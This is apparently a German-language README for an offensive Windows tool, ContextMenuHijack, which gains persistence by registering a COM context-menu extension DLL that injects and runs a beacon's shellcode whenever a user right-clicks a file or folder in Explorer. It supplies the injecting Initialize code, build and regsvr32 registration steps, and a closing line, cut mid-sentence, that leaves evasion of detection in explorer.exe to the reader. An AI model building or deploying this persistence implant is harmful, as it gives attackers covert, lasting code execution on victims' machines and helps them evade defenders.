
Führe bei jedem Rechtsklick auf eine Datei/einen Ordner im Explorer-Menü ein Payload aus, um Persistenz zu erlangen.
Diese ursprüngliche Idee, die mich inspiriert hat, stammt von @NinjaParanoid:
ContextMenuHijack ist eine einfache Persistenztechnik, die COM-Hijacking auf der Grundlage menschlichen Verhaltens nutzt: Wenn du im Datei-Explorer mit der rechten Maustaste auf eine Datei/einen Ordner klickst, um das Kontextmenü zu öffnen, wird zur gleichen Zeit der von uns angegebene Beacon ausgeführt.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Du musst nur die Projektmappendatei (.sln) laden und erstellen. Es ist wichtig zu wissen, dass du Administratorrechte benötigst, um diese Persistenztechnik zu nutzen. Wenn du das alles erledigt hast, musst du die DLL-Datei nur noch mit regsvr32 in der Registrierung registrieren:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
Wenn du es deinstallieren möchtest, verwende einfach das Flag
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe erkannt werden. Es liegt an dir, deine eigene Evasion-Tradecraft zu verwenden.
